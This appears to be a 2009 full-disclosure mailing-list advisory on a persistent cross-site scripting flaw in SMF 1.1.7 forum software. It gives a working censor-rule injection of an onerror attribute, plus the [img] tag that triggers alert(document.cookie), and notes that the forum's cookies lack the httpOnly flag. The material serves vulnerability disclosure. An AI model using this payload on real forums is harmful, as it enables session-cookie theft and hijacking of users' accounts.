[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8ba534860902030056n617c1d98w9edb4263c7f389d7@mail.gmail.com>
Date: Tue, 3 Feb 2009 02:56:37 -0600
From: Eduardo Vela <sirdarckcat@...il.com>
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
bugtraq@...urityfocus.com
Subject: SMF 1.1.7 Persistent XSS (requires permision to edit censor)
SMF 1.1.7 (simplemachines.org) XSS
Exploitation:
If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor
Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)
And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]
And the HTML code generated will be..
<img src="http://www.test-xss/" onerror="alert(document.cookie)"
alt="" border="0" />
Notes:
- SMF is not using httpOnly cookies.
- I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..
Greetings!!
-- Eduardo
http://www.sirdarckcat.net/
Powered by blists - more mailing lists